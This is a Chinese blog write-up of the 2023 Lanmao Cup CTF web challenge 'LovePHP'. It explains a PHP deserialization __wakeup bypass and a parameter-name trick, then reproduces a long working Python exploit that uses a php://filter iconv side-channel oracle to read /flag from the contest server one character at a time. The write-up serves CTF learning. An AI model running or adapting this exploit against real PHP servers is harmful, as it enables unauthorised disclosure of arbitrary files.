2023蓝帽杯CTFweb题LovePHP(复现)

最新推荐文章于 2023-12-26 13:09:11 发布
最新推荐文章于 2023-12-26 13:09:11 发布
阅读量492 收藏 4
点赞数 1
分类专栏: CTF Web安全 文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63138919/article/details/132588807
版权

LovePHP

这道题到比赛结束之后看了大佬的wp才做出来了

进入题目 发现源码

<?php 
class Saferman{
    public $check = True;
    public function __destruct(){
        if($this->check === True){
            file($_GET['secret']);
        }
    }
    public function __wakeup(){
        $this->check=False;
    }
}
if(isset($_GET['my_secret.flag'])){
    unserialize($_GET['my_secret.flag']);
}else{
    highlight_file(__FILE__);
}

那我们开始审计代码

我们传入的参数为my_secret.flag 然后经过反序列化 反序列化中发现get传入的参数里有_号是非法字符,如果直接传值传入my_secret.flag,会被php处理掉,那么我们就可以使用 [ 进行绕过反序列化 逻辑很简单 

__destruct()魔术方法判断check是否为True,是的话会执行file方法

__wakeup()魔术方法让check的值为False

我们知道__wakeup()一般会在__destruct()前执行,所以这里需要绕过__wakeup()

看一下题目的PHP版本,7.4.33

我们就可以采用C绕过 具体可以看我上篇文章

https://blog.csdn.net/m0_63138919/article/details/132545718

  更深层的可以看这位大佬的文章

https://fushuling.com/index.php/2023/03/11/php%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e4%b8%adwakeup%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93/

 当开头添加为c的时候,只能执行destruct函数,无法添加任何方法所以我们直接用C:8:"Saferman":0:{}就可以了

接下来就是如何利用file函数了,我们知道file函数的作用是把整个文件读入一个数组中

但是这个函数并不能造成回显

这里有一个专门的trick:侧信道攻击

具体内容访问大佬文章

https://fushuling.com/index.php/2023/03/11/php%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e4%b8%adwakeup%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93/

我们直接使用他的脚本(注意修改参数url)

import requests
import sys
from base64 import b64decode
def join(*x):
	return '|'.join(x)

def err(s):
	print(s)
	raise ValueError

def req(s):
	param = '{}'
	data = f'{param}&secret=php://filter/{s}/resource=/flag'

	return requests.get(f'http://123.57.73.24:47260//index.php?my[secret.flag=C:8:"Saferman":0:{data}').status_code == 500
blow_up_enc = join(*['convert.quoted-printable-encode']*1000)
blow_up_utf32 = 'convert.iconv.L1.UCS-4LE'
blow_up_inf = join(*[blow_up_utf32]*50)

header = 'convert.base64-encode|convert.base64-encode'

# Start get baseline blowup
print('Calculating blowup')
baseline_blowup = 0
for n in range(100):
	payload = join(*[blow_up_utf32]*n)
	if req(f'{header}|{payload}'):
		baseline_blowup = n
		break
else:
	err('something wrong')

print(f'baseline blowup is {baseline_blowup}')

trailer = join(*[blow_up_utf32]*(baseline_blowup-1))

assert req(f'{header}|{trailer}') == False

print('detecting equals')
j = [
	req(f'convert.base64-encode|convert.base64-encode|{blow_up_enc}|{trailer}'),
	req(f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.base64-encode{blow_up_enc}|{trailer}'),
	req(f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.iconv..CSISO2022KR|convert.base64-encode|{blow_up_enc}|{trailer}')
]
print(j)
if sum(j) != 2:
	err('something wrong')
if j[0] == False:
	header = f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.base64-encode'
elif j[1] == False:
	header = f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.iconv..CSISO2022KRconvert.base64-encode'
elif j[2] == False:
	header = f'convert.base64-encode|convert.base64-encode'
else:
	err('something wrong')
print(f'j: {j}')
print(f'header: {header}')
flip = "convert.quoted-printable-encode|convert.quoted-printable-encode|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.CSUNICODE.CSUNICODE|convert.iconv.UCS-4LE.10646-1:1993|convert.base64-decode|convert.base64-encode"
r2 = "convert.iconv.CSUNICODE.UCS-2BE"
r4 = "convert.iconv.UCS-4LE.10646-1:1993"

def get_nth(n):
	global flip, r2, r4
	o = []
	chunk = n // 2
	if chunk % 2 == 1: o.append(r4)
	o.extend([flip, r4] * (chunk // 2))
	if (n % 2 == 1) ^ (chunk % 2 == 1): o.append(r2)
	return join(*o)
rot1 = 'convert.iconv.437.CP930'
be = 'convert.quoted-printable-encode|convert.iconv..UTF7|convert.base64-decode|convert.base64-encode'
o = ''

def find_letter(prefix):
	if not req(f'{prefix}|dechunk|{blow_up_inf}'):
		# a-f A-F 0-9
		if not req(f'{prefix}|{rot1}|dechunk|{blow_up_inf}'):
			# a-e
			for n in range(5):
				if req(f'{prefix}|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
					return 'edcba'[n]
					break
			else:
				err('something wrong')
		elif not req(f'{prefix}|string.tolower|{rot1}|dechunk|{blow_up_inf}'):
			# A-E
			for n in range(5):
				if req(f'{prefix}|string.tolower|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
					return 'EDCBA'[n]
					break
			else:
				err('something wrong')
		elif not req(f'{prefix}|convert.iconv.CSISO5427CYRILLIC.855|dechunk|{blow_up_inf}'):
			return '*'
		elif not req(f'{prefix}|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
			# f
			return 'f'
		elif not req(f'{prefix}|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
			# F
			return 'F'
		else:
			err('something wrong')
	elif not req(f'{prefix}|string.rot13|dechunk|{blow_up_inf}'):
		# n-s N-S
		if not req(f'{prefix}|string.rot13|{rot1}|dechunk|{blow_up_inf}'):
			# n-r
			for n in range(5):
				if req(f'{prefix}|string.rot13|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
					return 'rqpon'[n]
					break
			else:
				err('something wrong')
		elif not req(f'{prefix}|string.rot13|string.tolower|{rot1}|dechunk|{blow_up_inf}'):
			# N-R
			for n in range(5):
				if req(f'{prefix}|string.rot13|string.tolower|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
					return 'RQPON'[n]
					break
			else:
				err('something wrong')
		elif not req(f'{prefix}|string.rot13|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
			# s
			return 's'
		elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
			# S
			return 'S'
		else:
			err('something wrong')
	elif not req(f'{prefix}|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
		# i j k
		if req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
			return 'k'
		elif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
			return 'j'
		elif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
			return 'i'
		else:
			err('something wrong')
	elif not req(f'{prefix}|string.tolower|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
		# I J K
		if req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
			return 'K'
		elif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
			return 'J'
		elif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
			return 'I'
		else:
			err('something wrong')
	elif not req(f'{prefix}|string.rot13|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
		# v w x
		if req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
			return 'x'
		elif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
			return 'w'
		elif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
			return 'v'
		else:
			err('something wrong')
	elif not req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
		# V W X
		if req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
			return 'X'
		elif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
			return 'W'
		elif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
			return 'V'
		else:
			err('something wrong')
	elif not req(f'{prefix}|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
		# Z
		return 'Z'
	elif not req(f'{prefix}|string.toupper|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
		# z
		return 'z'
	elif not req(f'{prefix}|string.rot13|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
		# M
		return 'M'
	elif not req(f'{prefix}|string.rot13|string.toupper|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
		# m
		return 'm'
	elif not req(f'{prefix}|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
		# y
		return 'y'
	elif not req(f'{prefix}|string.tolower|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
		# Y
		return 'Y'
	elif not req(f'{prefix}|string.rot13|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
		# l
		return 'l'
	elif not req(f'{prefix}|string.tolower|string.rot13|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
		# L
		return 'L'
	elif not req(f'{prefix}|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
		# h
		return 'h'
	elif not req(f'{prefix}|string.tolower|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
		# H
		return 'H'
	elif not req(f'{prefix}|string.rot13|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
		# u
		return 'u'
	elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
		# U
		return 'U'
	elif not req(f'{prefix}|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
		# g
		return 'g'
	elif not req(f'{prefix}|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
		# G
		return 'G'
	elif not req(f'{prefix}|string.rot13|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
		# t
		return 't'
	elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
		# T
		return 'T'
	else:
		err('something wrong')

print()
for i in range(100):
	prefix = f'{header}|{get_nth(i)}'
	letter = find_letter(prefix)
	# it's a number! check base64
	if letter == '*':
		prefix = f'{header}|{get_nth(i)}|convert.base64-encode'
		s = find_letter(prefix)
		if s == 'M':
			# 0 - 3
			prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'
			ss = find_letter(prefix)
			if ss in 'CDEFGH':
				letter = '0'
			elif ss in 'STUVWX':
				letter = '1'
			elif ss in 'ijklmn':
				letter = '2'
			elif ss in 'yz*':
				letter = '3'
			else:
				err(f'bad num ({ss})')
		elif s == 'N':
			# 4 - 7
			prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'
			ss = find_letter(prefix)
			if ss in 'CDEFGH':
				letter = '4'
			elif ss in 'STUVWX':
				letter = '5'
			elif ss in 'ijklmn':
				letter = '6'
			elif ss in 'yz*':
				letter = '7'
			else:
				err(f'bad num ({ss})')
		elif s == 'O':
			# 8 - 9
			prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'
			ss = find_letter(prefix)
			if ss in 'CDEFGH':
				letter = '8'
			elif ss in 'STUVWX':
				letter = '9'
			else:
				err(f'bad num ({ss})')
		else:
			err('wtf')

	print(end=letter)
	o += letter
	sys.stdout.flush()
print()
d = b64decode(o.encode() + b'=' * 4)
# remove KR padding
d = d.replace(b'$)C',b'')
print(b64decode(d))

跑一下就可以得到flag

总结

1.关于_wakeup()函数的绕过

2.侧信道攻击

3.反序列化中[绕过_

W3nd4L0v3
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
love.php源代码,OELOVE:婚恋系统的二次开发之模版内执行PHP代码
weixin_32230811的博客
04-07 411
OELOVE是一个核心代码加密了的PHP婚恋交友系统,一站长朋友老早之前就喊我帮他看看一些细小之处未改善好的地方,今天抽出时间帮他看了看。本以为和往常一样比较简单就能解决问,结果因为MVC的module和controller都加密了,空有一个view(即模版)实在展示不出PHP的功能。对系统代码七看八看、并且研究OELOVE的模版标签文档,终于能找出一条路子让模版能调用二次开发的PHP代码——利...
【电子取证】程序分析(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-12
第六届”蓝帽杯“全国大学生网络安全技能大赛
【电子取证】网站取证(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-12
第六届”蓝帽杯“全国大学生网络安全技能大赛
love.php,love.php
weixin_31301881的博客
04-12 94
header("Content-Type: text/html; charset=utf-8");include('includes/Core.php');$imgURL = $BzlsHandle->getImgUrl();?>戴小小破蛋日var isDesktop = navigator['userAgent'].match(/(ipad|iphone|ipod|android|w...
love.php,lovephp
weixin_31175771的博客
04-12 108
1、PHP代码中函数前面的@是什么意思?答:@的作用是忽略调用该函数时产生的错误信息。2、为什么出现“APACHE.EXE: cannot determine local hostname.”?答:由于Windows版本的Apache默认情况下不指定ServerName,所以运行时会出错。解决的办法是修改Apache安装目录下的conf目录下的httpd.conf:- 搜索ServerName- ...
love.php源代码,love.php
weixin_29001655的博客
04-07 301
I love U@font-face {font-family: digit;src: url('digital-7_mono.ttf') format("truetype");}/***2014—01-04,*/Boy name = MrZHANGGirl name = MrsLIU// Fall in love river. The boy love the girl;// They love...
LOVEPHP-WEB全栈开源框架发布
yuhaotjutwt的博客
08-06 126
LOVEPHP是一款专为WEB开发设计的全栈开源框架, 这不是开源世界的一个轮子,这是一辆车,可以直接开的那种,专为全栈开发设计
第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)其他赛
08-05
【标】:“第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)其他赛”揭示了这是一场聚焦网络安全的竞赛,旨在提升大学生在网络安全领域的技能和实战能力。蓝帽杯作为一项知名的赛事,每年都会吸引众多学子...
【电子取证】计算机取证(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-13
第六届"蓝帽杯"全国大学生网络安全技能大赛正是这样一个平台,旨在培养和挖掘大学生在网络安全,尤其是电子取证方面的能力与潜力。 电子取证,或称数字取证,是指在法律框架下,对电子设备中的数据进行收集、分析、...
【MISC】domainhacker2(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-11
【MISC】domainhacker2 是一场比赛项目,源自第六届"蓝帽杯"全国大学生网络安全技能大赛。这个比赛旨在提升大学生在网络安全领域的实践能力和理论知识,促进网络安全技术的学习与交流。从提供的文件名来看,我们可以...
[第七届蓝帽杯全国大学生网络安全技能大赛 蓝帽杯 2023]——Web方向部分 详细Writeup
Leaf_initial的博客
08-27 4236
Web LovePHP 你真的熟悉PHP吗? 源码如下 <?php class Saferman{ public $check = True; public function __destruct(){ if($this->check === True){ file($_GET['secret']); } } public function __wakeup(){ $this->c
2023蓝帽杯半决赛 WP(Re&Crypto&Misc)
最新发布
qq_73505302的博客
12-26 188
大二上的第二次线下比赛,远赴哈尔滨,最终得到21名(队里少一名队友捏),可惜差一名进决赛,但愿可以作为明年的铺垫吧。。。
2023蓝帽杯CTF misc部分wp
mo2901600657的博客
08-28 858
再尝试用vol恢复,把输出仿真出来搜索table.zip得到该文件的内存地址,再通过内存地址将文件导出到本地。取证大师快捷方式解析里面有个key.rsmr的快捷方式(导出源文件提示大小为0无法导出)提示是明文攻击,想到zip明文攻击,发现有一个zip文件(table.zip)取证大师打开后发现没有任何文件怀疑文件被格式化,对镜像进行文件恢复。翻阅了vol的所用参数,发现还有一个可以查看命令行记录的参数。查看ie记录也发现了该文件,那说明这个文件可能是有用的。再次使用vol导出,找到该文件内存地址,导出。
2023年第七届蓝帽杯半决赛WP(CTF&取证)
weixin_63576152的博客
09-18 1461
打开xlsx文件,打开以后,发现没有字,ctrl+a全选,修改你字体颜色,发现有些加粗,有些没加粗,结合目,应当排序,将每一列从小到大排序,将加粗的单元格改成黑色,将列宽改为2,得到二维码,扫描后得到flag。对SMS.txt的加密逻辑是先AES加密,再base64加密,AES的秘钥在Getkey函数中。base64解码calllog.txt,得到通话记录,搜索10086结果是2条,且都为呼进。Base64、BASE64都是错的,答案格式模糊,而且base64是编码,不是很懂。
2023蓝帽杯初赛
2202_75317918的博客
09-02 613
2023蓝帽杯初赛
2022蓝帽杯wp
hez__的博客
07-10 601
蓝帽杯 2022 wp
2022第六届蓝帽杯半决赛服务器取证部分wp
dazaogege的博客
10-11 1568
2022第六届蓝帽杯半决赛服务器取证部分wp
Simple_SSTI_1
qdlws的博客
07-22 2000
Simple_SSTI_1
第六届”蓝帽杯“全国大学生网络安全技能大赛WriteUp
qq_45603443的博客
07-09 2406
第六届蓝帽杯全国大学生网络安全技能大赛 Writeup
2023蓝帽杯初赛misc下载
12-04
2023蓝帽杯初赛misc下载是指在2023年举办的蓝帽杯网络安全竞赛中的一项miscellaneous(杂项)类目的下载。在初赛中,参赛选手需要下载与miscellaneous相关的目文件或资源,并进行分析和解决。 首先,参赛选手需要前往蓝帽杯竞赛官方网站或相关论坛查找与初赛misc下载相关的公告或指引。这些网站通常会提供下载链接或资源分享的方式,以方便选手获取目所需的文件或资源。 其次,根据所提供的下载链接,选手可以点击链接进行下载,也可以使用迅雷、qq旋风等下载工具进行高速下载,以确保下载的文件完整和无误。 在完成下载后,选手需要对下载的文件进行验证。可使用md5校验工具对下载后的文件进行校验,以确保文件的完整性和正确性,防止下载过程中出现错误导致文件损坏。 之后,选手可以开始进行miscellaneous目的解析和答。首先,解压下载的文件,查看所提供的目资源、源代码或二进制文件等。根据目要求和提示,选手可以使用各种工具和技术,如逆向工程、数据分析、密码学等,进行问的分析和解决,并找出相应的答案或flag。 最后,选手需要将自己的解过程、思路和答案记录下来,并按照比赛规则的要求提交答案。可以是一个文本文件或截图,或是将解决问的代码或脚本提交到竞赛平台或指定的邮箱中。 总之,2023蓝帽杯初赛misc下载是参赛选手在参加蓝帽杯网络安全竞赛中所需进行的一项任务。选手需要在蓝帽杯官方网站或相关论坛上获取下载链接并下载目相关的文件或资源,然后对其进行验证、解析和解决,最后提交答案以完成竞赛的要求。这项任务对选手的网络安全技术、解思维和团队合作能力都提出了较高的要求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W3nd4L0v3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值